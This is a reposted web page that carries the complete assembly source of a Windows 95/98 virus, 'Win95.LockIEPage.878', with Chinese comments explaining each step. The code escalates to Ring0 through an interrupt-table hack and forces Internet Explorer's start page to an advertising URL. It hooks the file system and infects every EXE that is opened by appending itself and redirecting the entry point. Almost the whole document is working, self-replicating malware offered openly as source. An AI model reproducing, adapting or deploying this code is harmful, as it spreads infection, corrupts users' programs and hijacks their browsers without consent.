Win9x病毒--Win95.LockIEPage.878原代码

/ns/wz/comp/data/20020813023201.htm

Win9x病毒--Win95.LockIEPage.878原代码

Author: whg
Email: whg@whitecell.org
Homepage:http://www.whitecell.org

include win32v.inc
extrn ExitProcess: proc
.586p
.model flat,stdcall
.data
@@Start:
pushad
push eax
sidt [esp-2] ;保存Idt基地址
pop esi ;弹出Idt基地址
add esi,3*8 ;得到中断03的线形地址指针
mov ecx,[esi]
mov edx,[esi+4] ;保存中断03的线形地址
call @@SetMyInt03
@@MyInt03: ;我的中断03 Ring0程序
pushad
mov [esi],ecx
mov [esi+4],edx ;恢复中断03的线形地址
mov eax,dr3 ;我用dr3做病毒标志
mov ecx,VirusFlag
@@IsInstalled:
cmp eax,ecx
jz @@ExitHook
mov dr3,ecx ;设置病毒标志
call @@SetVxdCall ;填写VXDCALL指令（Int 20h）
@@SetVxdCallOk:
push eax
push esp
call @@PushPathNameAddr
PathName db 'SoftWare\MicroSoft\Internet Explorer\Main',0
@@PushPathNameAddr:
push 80000001h
@@RegOpenKey:
int 20h ;打开注册表一个Key
dd 00010148h ;VMMCall_RegOpenKey
add esp,3*4
pop ebp
or eax,eax
jnz short @@OpenRegKeyError
push 040h
call @@PushHttpNameAddr
HttpName db 'http://202.115.16.8/~ekang',0 ;这是广告网页
@@PushHttpNameAddr:
push 01h
push 00h
call @@PushValueNameAddr
ValueName db 'Start Page',0
@@PushValueNameAddr:
push ebp
@@RegSetValueEx:
int 20h ;设置IE Start Page页面为我的广告网址
dd 00010152h ;VMMCall_RegSetValueEx
add esp,6*4
push ebp
@@RegCloseKey:
int 20h ;关闭注册表句柄
dd 00010149h ;VMMCall_RegCloseKey
add esp,1*4
@@OpenRegKeyError:
push L 0fh
push L 00
push L -1
push L 00
push L 00
push L 00
push L 01
push L 02
@@AllocPage:
int 20h ;为病毒连接一个挂接页（大小=1000h)
dd 00010053h ;VMMCall_AllocPage
add esp,8*4
or eax,eax
jz short @@ExitHook ;连接失败
mov edi,eax
call @@GetVirusStartAddr
@@GetVirusStartAddr:
pop esi
sub esi,OFF @@GetVirusStartAddr-OFF @@Start
mov ecx,VirusSize
cld
rep movsb ;将病毒搬移到Ring0页内
mov edi,eax
add eax,OFF @@MyFileHookApi-OFF @@Start
push eax
@@HookFileApi:
int 20h ;挂接文件系统
dd 00400067h ;VMMCall_HookFileSystem
add esp,04h
mov [edi+OFF OldFileHookApi-@@Start],eax
@@ClsOptFlag:
xor eax,eax ;清除重入标志
mov [edi.OFF OptFlag-OFF @@Start],eax
@@ExitHook:
popad
iretd ;返回到Ring3继续，标号@@Ring3GoOn
@@SetMyInt03:
cli
pop W[esi]
pop W[esi+6] ;修改中断03的线形地址
int 03 ;进入Ring0标号@@MyInt03
@@Ring3GoNo:
sti
popad
MoveToEax db 0b8h
OldAppEntry dd OFF @@Exit
jmp eax ;跳去执行原程序
;IFSFileHookFunc(pIFSfn,nfn,nDrv,nRType,nCP,pir);
@@MyFileHookApi:
pushad
mov ebp,esp
push ds
push es
push ss
pop ds
push ss
pop es ;设置数据段
cmp D[ebp+(8+1+1)*4],36 ;是否打开文件调用？
jnz short @@OldFileHookApi
call @@GetPathName
@@OldFileHookApi:
pop es
pop ds
popad
JmpMem dw 25ffh ;跳到原文件挂接函数运行
OldFileHookApi dd ?
OptFlag dd 00h
@@GetPathName:
pop esi
push esi ;Push Back Addr
@@IsOptFlagSet:
add esi,OFF OptFlag-OFF @@OldFileHookApi
mov ecx,VirusFlag
cmp [esi],ecx ;是否重入？
jz short @@RetOldHookApi
@@SetOptFlag:
mov [esi],ecx ;设置重入标志
add esi,OFF FilePathBuffer-OFF OptFlag
mov edi,esi
mov eax,[ebp+(8+1+2)*4];Get nDriver(1=A;2=B,3=C...)
add ax,':A'-1
cld
stosw ;构造Ansi路径名
mov esi,[ebp+(8+1+5)*4];Get ioreq
mov eax,[esi+0ch];Get UniCode PathName Addr
add eax,04h
push L 0
push L 100h
push eax
push edi
@@UniToBCSPath:
Int 20h ;继续构造Ansi路径名
dd 00400041h ;VMMCall_UniToBCSPath
add esp,4*4
or eax,eax
jz short @@ClearOptFlag
mov eax,[edi+eax-4]
not eax
cmp eax,not ('EXE.') ;是EXE文件吗？
jnz short @@ClearOptFlag
call @@OptFile
@@ClearOptFlag:
pop esi
push esi ;Push Back Addr
add esi,OFF OptFlag-OFF @@OldFileHookApi
xor eax,eax
mov [esi],eax ;清除重入标志
@@RetOldHookApi:
ret
@@OptFile: ;以下是修改PE文件，将病毒复在原文件尾
mov esi,edi
dec esi
dec esi
mov ebp,esi ;保存FilePathName地址在ebp中
mov eax,4300h
call @@FileIo ;IFSCall_FileIo 得到文件属性
jc @@OpenFileFalse
push ecx ;保存文件属性
xor ecx,ecx
mov eax,4301h
call @@FileIo ;IFSCall_FileIo 将文件属性设为0
xor eax,eax
mov edx,eax
inc edx
mov ebx,edx
inc ebx
mov ax,0d500h
call @@FileIo ;IFSCall_FileIo 打开文件
pop ecx ;弹出文件属性
pushfd ;保存标志
push eax ;保存文件Ring0句柄
mov eax,4301h
call @@FileIo ;IFSCall_FileIo 设置文件属性，恢复文件属性
pop ebx ;弹出文件Ring0句柄
popfd
jc @@OpenFileFalse
@@GetReadFileBuffer:
add esi,size FilePathBuffer
mov ecx,size ReadFileBuffer
xor edx,edx
mov eax,0d600h ;IFSCall_FileIo 读文件
call @@FileIo
jc @@CloseFile
cmp eax,ecx
jnz @@CloseFile
cmp word ptr [esi],'ZM' ;是Exe文件吗？
jnz @@CloseFile
movzx eax,word ptr[esi+3ch]
cmp eax,size ReadFileBuffer-200h
ja @@CloseFile
add esi,eax ;esi=Pe文件Pe头结构
cmp [esi.fhPEFlag],'EP' ;是Pe文件吗？
jnz @@CloseFile
cmp [esi.fhCheckSum],VirusFlag ;已经传染过了吗？
jz @@CloseFile
mov [esi.fhCheckSum],VirusFlag ;设置感染标志
@@SaveOldAppEntryRVA:
mov eax,[esi.fhEntryRVA]
add eax,[esi.fhImageBase] ;得到老文件入口线形地址
mov [ebp+OFF OldAppEntry-OFF FilePathBuffer],eax
movzx ecx,[esi.fhObjectCount]
dec ecx
mov eax,size ObjectTable
mul ecx
cmp eax,size ReadFileBuffer-200h
ja short @@CloseFile
lea edi,[esi.fhObjectTable00+eax] ;得到最后一块段表地址
mov edx,[edi.otPhysOffset]
add edx,[edi.otPhysSize]
mov ecx,VirusSize
push esi
@@GetVirusBase:
mov esi,ebp
sub esi,OFF FilePathBuffer-OFF @@Start
mov eax,0d601h
call @@FileIo ;IFSCall_FileIo 写文件，将病毒写在最后一段的末尾
pop esi
jc short @@CloseFile
@@SetNewEntryRVA:
mov eax,[edi.otPhysSize]
add eax,[edi.otRVA]
mov [esi.fhEntryRVA],eax ;改变文件的入口RVA（相对虚拟地址）
@@FixOtherHeaderVar: ;修改相关文件头变量
add [edi.otPhysSize],ecx
mov eax,[edi.otPhysSize]
sub eax,[edi.otVirtSize]
jb short @@VirtSizeIsBigger
@@PhysSizeIsBigger:
add [edi.otVirtSize],eax
add [esi.fhImageSize],eax
@@VirtSizeIsBigger:
nop
@@GetReadFileBuffer0:
mov esi,ebp
add esi,size FilePathBuffer
@@WriteBackFileHeader:
mov ecx,size ReadFileBuffer
xor edx,edx
mov eax,0d601h
call @@FileIo ;IFSCall_FileIo 写文件，将文件头写回文件
@@CloseFile:
mov eax,0d700h
call @@FileIo ;IFSCall_FileIo 关闭文件
@@OpenFileFalse:
ret
@@FileIo:
int 20h ;这里是IFSCall_FileIO子函数
dd 00400032h
ret
@@SetVxdCall: ;以下是恢复VXDCALL（Int 20h)指令
pop ebx
push ebx
mov ax,020cdh
lea esi,[ebx+OFF @@VxdCallTable-@@SetVxdCallOk]
cld
lea edi,[ebx+OFF @@RegOpenKey-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@RegSetValueEx-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@RegCloseKey-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@AllocPage-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@HookFileApi-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@UniToBCSPath-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@FileIo-OFF @@SetVxdCallOk]
stosw
movsd
ret
@@VxdCallTable: ;VXD调用列表
dd 00010148h ;VMMCall_RegOpenKey
dd 00010152h ;VMMCall_RegSetValueEx
dd 00010149h ;VMMCall_RegCloseKey
dd 00010053h ;VMMCall_AllocPage
dd 00400067h ;IFSCall_HookFileApi
dd 00400041h ;IFSCall_UniToBCSPath
dd 00400032h ;IFSCall_FileIo
VirusMsg db 'Lock IE Start Page Ver 2.0,By Whg 2001.6.13',0
@@VirusEnd:
VirusSize=OFF @@VirusEnd-OFF @@Start
VirusFlag=VirusSize
FilePathBuffer db 100h dup(?) ;文件Ansi路径Buffer
ReadFileBuffer db 900h dup(?) ;原PE文件数据Buffer
.code
@@Exit:
call ExitProcess,L 0
ends
end @@Start